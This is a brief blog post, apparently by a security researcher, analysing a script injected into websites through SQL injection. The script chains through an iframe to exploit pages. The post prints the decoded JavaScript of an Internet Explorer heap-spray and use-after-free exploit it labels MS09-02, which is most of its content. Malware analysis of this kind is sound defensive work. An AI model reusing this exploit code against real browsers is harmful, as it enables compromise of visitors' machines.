deabak.com/z.js

this is a new script that are being sql-injected.

z.js contains a iframe from http://www.893500.cn/2/index.htm

The index.htm contains links to several the typical variety of exploits. One of which 02.htm is a MS09-02 exploit.

The IE7 exploit is decoded as follows:

var b=unescape(“%”+”u”+”0″+”C”+”0″+”C”+”%”+”u”+”0″+”C”+”0″+”C”);
var test99=yumen;
var yumen=new Array();
Tameeeeee=unescape(ttt.replace(/Game/g,”\x25\x75″));
while(b.length<0x100000-(ttt.length*2+0x01020)/2){b+=b}var lh=b.substring(0,0×100000-(ttt.length*2+0x01020)/2);
for(i=0; i<0xC0; i++){yumen[i]=lh+Tameeeeee}CollectGarbage();
var s1=unescape(“%”+”u”+”0″+”b”+”0″+”b”+”%”+”u”+”0″+”b”+”0″+”b”+”kfkfkfkfkfkfkfkfkfkfkfkfk”);
var a1=new Array();
for(var x=0; x<1000; x++)a1.push(document.createElement(“img”));
function ok(){o1=document.createElement(“tbody”);
o1.click;
var o2=o1.cloneNode();
o1.clearAttributes();
o1=null;
CollectGarbage();
for(var x=0; x<a1.length; x++)a1[x].src=s1; o2.click}

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: